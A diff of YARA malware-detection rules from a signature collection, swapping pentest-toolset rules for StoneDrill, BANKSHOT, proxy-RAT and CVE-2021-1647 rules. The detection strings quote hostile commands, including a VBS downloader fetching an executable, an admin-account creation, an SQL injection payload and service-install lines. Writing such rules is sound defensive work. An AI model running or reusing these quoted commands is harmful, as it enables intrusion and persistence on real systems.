-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d01781f1246fd1b64e09170bd6600fe1"
+		hash2 = "ac3c25534c076623192b9381f926ba0d"
+		version = "1.0"
 
 	strings:
-		$s1 = "The terminal server cannot issue a client license.  It was unable to issue the" wide
-		$s6 = "%s\\%s\\%d\\%d" fullword wide
+		$code = {B8 08 00 FE 7F FF 30 8F 44 24 ?? 68 B4 0F 00 00 FF 15 ?? ?? ?? 00 B8 08 00 FE 7F FF 30 8F 44 24 ?? 8B ?? 24 [1 - 4] 2B ?? 24 [6] F7 ?1 [5 - 12] 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1052KB and all of them
+		uint16( 0 ) == 0x5A4D and $code and filesize < 5000000
 }
-rule SIGNATURE_BASE_CN_Honker_IIS6_Iis6 : FILE
+rule SIGNATURE_BASE_Stonedrill_BAT_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file iis6.com"
+		description = "Rule to detect Batch file from StoneDrill report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
-		date = "2015-06-23"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L773-L790"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L65-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
-		logic_hash = "51b2fdae6437d64661f20342711d516201740eceb2273704a6e415be2cac54f6"
-		score = 70
+		logic_hash = "d7263a527cae45072082c0f2fd0abc33acb2a25b34c06becf36fbd36f0697d5c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "GetMod;ul" fullword ascii
-		$s1 = "excjpb" fullword ascii
-		$s2 = "LEAUT1" fullword ascii
-		$s3 = "EnumProcessModules" fullword ascii
+		$s1 = "set u100=" ascii
+		$s2 = "set u200=service" ascii fullword
+		$s3 = "set u800=%~dp0" ascii fullword
+		$s4 = "\"%systemroot%\\system32\\%u100%\"" ascii
+		$s5 = "%\" start /b %systemroot%\\system32\\%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		uint32( 0 ) == 0x68636540 and 2 of them and filesize < 500
 }
-rule SIGNATURE_BASE_CN_Honker_Struts2_Catbox : FILE
+rule SIGNATURE_BASE_Stonedrill_Service_Install : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
+		description = "Rule to detect Batch file from StoneDrill report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9"
-		date = "2015-06-23"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L792-L807"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L82-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304"
-		logic_hash = "20bda5c918ea38810603528a20f3406ec4e79ce999681649e8e806bf549b5359"
-		score = 70
+		logic_hash = "52abe90c7f87ffeace4b58f9959e5a21c475bfa7ae2c5bc2744fe5fe43ffdda8"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
-		$s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii
+		$s1 = "127.0.0.1 >nul && sc config" ascii
+		$s2 = "LocalService\" && ping -n" ascii fullword
+		$s3 = "127.0.0.1 >nul && sc start" ascii fullword
+		$s4 = "sc config NtsSrv binpath= \"C:\\WINDOWS\\system32\ntssrvr64.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8160KB and all of them
+		2 of them and filesize < 500
 }
-rule SIGNATURE_BASE_CN_Honker_Getlsasrvaddr : FILE
+rule SIGNATURE_BASE_Stonedrill_Ntssrvr32 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
+		description = "Detects malware from StoneDrill threat report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa0c0376-c5c3-5b48-b03e-86cefb547479"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L809-L826"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
+		modified = "2023-01-27"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L98-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce"
-		logic_hash = "e626724430d0b74aee52783dd5abdb8ccc7b951c56041e5c166b78b7370bc402"
-		score = 70
+		logic_hash = "f1122aba53f32b10bd5f43cb619aa5d668b1457f3a5ea2a68c97254ab8631faa"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
 
 	strings:
-		$s8 = "pingme.txt" fullword ascii
-		$s16 = ".\\lsasrv.pdb" ascii
-		$s20 = "Addresses Found: " fullword ascii
+		$s1 = "g\\system32\\" wide
+		$s2 = "ztvttw" fullword wide
+		$s3 = "lwizvm" fullword ascii
+		$op1 = { 94 35 77 73 03 40 eb e9 }
+		$op2 = { 80 7c 41 01 00 74 0a 3d }
+		$op3 = { 74 0a 3d 00 94 35 77 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Ms10048_X64 : FILE
+rule SIGNATURE_BASE_Stonedrill_Malware_2 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
+		description = "Detects malware from StoneDrill threat report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b65b0bad-d74c-5e7a-a613-69ef80585c23"
-		date = "2015-06-23"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L828-L843"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L120-L145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
-		logic_hash = "49addce6bef7588bf7683836a54bec6a2a646ecc3f7547083174d2255454cdf0"
-		score = 70
-		quality = 85
+		logic_hash = "cb1f8b24465ad8ca19dd540b1f8b63a73bc2624958bf45547b15c10583d07281"
+		score = 75
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
 
 	strings:
-		$s1 = "[ ] Creating evil window" fullword ascii
-		$s2 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$s1 = "cmd /c WMIC Process Call Create \"C:\\Windows\\System32\\Wscript.exe //NOLOGO " fullword wide
+		$s2 = "C:\\ProgramData\\InternetExplorer" fullword wide
+		$s3 = "WshShell.CopyFile \"" fullword wide
+		$s4 = "Abd891.tmp" fullword wide
+		$s5 = "Set WshShell = Nothing" fullword wide
+		$s6 = "AaCcdDeFfGhiKLlMmnNoOpPrRsSTtUuVvwWxyZz32" fullword ascii
+		$s7 = "\\FileInfo.txt" wide
+		$x1 = "C-PDI-C-Cpy-T.vbs" fullword wide
+		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
+		$x3 = "C-PDC-C-Cpy-T.vbs" fullword wide
+		$x4 = "AC-PDC-C-Cpy-T.vbs" fullword wide
+		$x5 = "C-Dlt-C-Trsh-T.tmp" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or 5 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Logcleaner : FILE
+rule SIGNATURE_BASE_Stonedrill : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
+		description = "Detects malware from StoneDrill threat report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
-		date = "2015-06-23"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L845-L860"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L147-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
-		logic_hash = "3be059627c39e262e7621fce637df21ddcabef91753192cec356f2f8cd58c1a3"
-		score = 70
-		quality = 83
+		logic_hash = "ef7173e259f985083d5451a2d464047b40112a084a05d471797d5dbf2d0fb21d"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83"
+		hash2 = "62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260"
+		hash3 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
 
 	strings:
-		$s3 = ".exe <ip> [(path]" fullword ascii
-		$s4 = "LogCleaner v" ascii
+		$x1 = "C-Dlt-C-Trsh-T.tmp" fullword wide
+		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
+		$s1 = "Hello dear" fullword ascii
+		$s2 = "WRZRZRAR" fullword ascii
+		$opa1 = { 66 89 45 d8 6a 64 ff }
+		$opa2 = { 8d 73 01 90 0f bf 51 fe }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or ( all of ( $op* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Shell_Brute_Tool : FILE
+rule SIGNATURE_BASE_Stonedrill_VBS_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
+		description = "Detects malware from StoneDrill threat report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1"
-		date = "2015-06-23"
+		id = "a7ee3bd4-eeae-5eb4-92e7-9601ec17300a"
+		date = "2017-03-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L862-L877"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L172-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f6903a15453698c35dce841e4d09c542f9480f01"
-		logic_hash = "723fd18e59c0017b67a035ec7c685169c517d673c2bbc8fe93071b8dbd1e606a"
-		score = 70
+		logic_hash = "79416d27a6a09d544becd84f8e551c09b94c97181f8fddc481f47e42763d47ac"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f4d608a87e36cb0dbf1b2d176ecfcde837070a2b2a049d532d3d4226e0c9587"
 
 	strings:
-		$s0 = "http://24hack.com/xyadmin.asp" fullword ascii
-		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$x1 = "wmic /NameSpace:\\\\root\\default Class StdRegProv Call SetStringValue hDefKey = \"&H80000001\" sSubKeyName = \"Software\\Micros" ascii
+		$x2 = "ping 1.0.0.0 -n 1 -w 20000 > nul" fullword ascii
+		$s1 = "WshShell.CopyFile \"%COMMON_APPDATA%\\Chrome\\" ascii
+		$s2 = "WshShell.DeleteFile \"%temp%\\" ascii
+		$s3 = "WScript.Sleep(10 * 1000)" fullword ascii
+		$s4 = "Set WshShell = CreateObject(\"Scripting.FileSystemObject\") While WshShell.FileExists(\"" ascii
+		$s5 = " , \"%COMMON_APPDATA%\\Chrome\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( filesize < 1KB and 1 of ( $x* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Hxdef100 : FILE
+rule SIGNATURE_BASE_EXPL_CVE_2021_1647_Apr21_1 : CVE_2021_1647 FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3b931752-85ae-52d0-9deb-1a1b03b39e32"
-		date = "2015-06-23"
+		description = "Detects samples that exploit CVE-2021-1647"
+		author = "Arkbird_SOLG"
+		id = "ecce018e-1bee-5374-b6c8-984c2a8c2530"
+		date = "2021-05-04"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L879-L895"
+		reference = "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_1647.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6"
-		logic_hash = "49f15482104297f0c57713712a7add49d58007afeefd11151dc5749b755860ba"
-		score = 70
+		logic_hash = "b0e1809ba10e5ea624e1c4d2e948c928c590b40e6315def8cb1216930ead8579"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2021-1647, FILE"
+		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
+		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
+		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
+		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
 
 	strings:
-		$s6 = "BACKDOORSHELL" fullword ascii
-		$s15 = "%tmpdir%" fullword ascii
-		$s16 = "%cmddir%" fullword ascii
+		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
+		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		filesize > 10KB and filesize < 10000KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Arp_EMP_V1_0 : FILE
+rule SIGNATURE_BASE_Hiddencobra_BANKSHOT_Gen : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
+		description = "Detects Hidden Cobra BANKSHOT trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03782e94-4fac-529f-b235-19cdb124d53b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L897-L911"
+		id = "fbf9dd32-cb9a-51f2-bd03-0387fbf44baa"
+		date = "2017-12-26"
+		modified = "2022-06-10"
+		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_bankshot.yar#L11-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
-		logic_hash = "457035b1685ac7f1bdccaab0b64bb1ad3ca1bf5e0747222347ced2a11b9b9504"
-		score = 70
-		quality = 85
+		logic_hash = "db4d396736ab42942f1a11a819419410e388b011e8992ad187c2f484d637c99c"
+		score = 75
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486"
+		hash2 = "8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247"
+		hash3 = "b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24"
+		hash4 = "daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75"
+		hash5 = "ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699"
+		hash6 = "d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff"
+		hash7 = "ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9"
+		hash8 = "3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6"
+		hash9 = "6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca"
 
 	strings:
-		$s0 = "Arp EMP v1.0.exe" fullword wide
+		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword wide
+		$s2 = "rHTTP/1.1 200 Connection established" fullword wide
+		$s3 = "Proxy-Connection: keep-alive" fullword wide
+		$s4 = "\\msncf.dat" wide
+		$s5 = "msvcru32.bat" fullword ascii
+		$s6 = "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"%s\" /f" fullword ascii
+		$s7 = "MXINFO.DLL" fullword ascii
+		$s8 = "usrvc32.bat" fullword ascii
+		$s9 = "ping -n 1 127.0.0.1" fullword ascii
+		$s10 = "%sd.e%sc \"%s > %s 2>&1\"" ascii fullword
+		$s11 = "DWS*.tmp" ascii fullword
+		$s12 = "CS*.tmp" fullword wide
+		$s13 = "WM*.tmp" fullword wide
+		$x1 = "CgpaipIddwspwe32Hnaehsdi" fullword ascii
+		$x2 = "RpiPmtiCdopIsgpao" fullword ascii
+		$x3 = "RpiLtnodlhOtgpcidgyA" fullword ascii
+		$x4 = "LatiQdgHtnrwpDbupci" fullword ascii
+		$x6 = "\\system32\\msncf.dat" ascii
+		$x7 = "GprthipgHpgktcpCigwSanowpgA" fullword ascii
+		$a1 = "live.dropbox.com" fullword ascii
+		$a2 = "tatadocomo.yahoo.com" fullword ascii
+		$a3 = "widgets.twimg.com" fullword ascii
+		$a4 = "history.paypal.com" fullword ascii
+		$a5 = "www.bitcoin.org" fullword ascii
+		$a6 = "web.whatsapp.com" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of ( $s* ) or 4 of ( $a* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Getwebshell : FILE
+rule SIGNATURE_BASE_Unauthorized_Proxy_Server_RAT
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "919883f4-af66-5d07-ad41-8cba3e049396"
-		date = "2015-06-23"
+		description = "Detects Proxy Server RAT"
+		author = "US-CERT Code Analysis Team"
+		id = "378573e3-17a7-5862-aae5-a8e84102e237"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L913-L930"
+		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_bankshot.yar#L67-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
-		logic_hash = "5d6638596607884950e702144416eb6fd3b009c88e4af5f81a50f346d7491c95"
-		score = 70
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "7ede26272ddcb25dca2b44ff08b232f358078872f6cf76491b0fd8d65772c60d"
+		score = 75
+		quality = 85
+		tags = ""
+		hash1 = "C74E289AD927E81D2A1A56BC73E394AB"
+		hash2 = "2950E3741D7AF69E0CA0C5013ABC4209"
 
 	strings:
-		$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii
-		$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide
-		$s14 = "net user admin$ hack /add" fullword wide
-		$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide
+		$s0 = {8A043132C288043125FF00000003C299F73D40404900A14440490003D0413BCF72DE5E5FC3}
+		$s1 = {8A04318844241432C28804318B44241425FF00000003C299F73D40404900A14440490003D0413BCF72D65E5FC3}
+		$s2 = {8A04318844241432C28804318B44241425FF00000003C299F73D5C394100A16039410003D0413BCF72D65E5FC3}
+		$s3 = {8A043132C288043125FF00000003C299F73D5C394100A16039410003D0413BCF72DE5E5FC3}
+		$s4 = {B91A7900008A140780F29A8810404975F4}
+		$s5 = {399FE192769F839DCE9F2A9D2C9EAD9CEB9FD19CA59F7E9F539CEF9F029F969C6C9E5C9D949FC99F}
+		$s6 = {8A04318844241432C28804318B44241425FF00000003C299F73D40600910A14460091003D0413BCF72D65E5FC3}
+		$s7 = {3C5C75208A41014184C074183C72740C3C7474083C6274043C2275088A41014184C075DC}
+		$s8 = {8B063D9534120077353D59341200722E668B4604663DE8037F24}
+		$s9 = {8BC88B74241CC1E1052BC88B7C2418C1E1048B5C241403C88D04888B4C242083F9018944240C7523}
+		$s10 = {8B063D9034120077353D59341200722E668B4604663DE8037F246685C0}
+		$s11 = {30110FB60148FFC102C20FBEC09941F7F94103D249FFC875E7}
+		$s12 = {448BE8B84FECC44E41F7EDC1FA038BCAC1E91F03D16BD21A442BEA4183C541}
+		$s13 = {8A0A80F9627C2380F9797F1E80F9647C0A80F96D7F0580C10BEB0D80F96F7C0A80F9787F05}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them
+		any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cracker_SHELL : FILE
+rule SIGNATURE_BASE_SUSP_Xored_Mozilla_Oct19
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2249a058-7469-5054-9c51-cb20ef8197ca"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
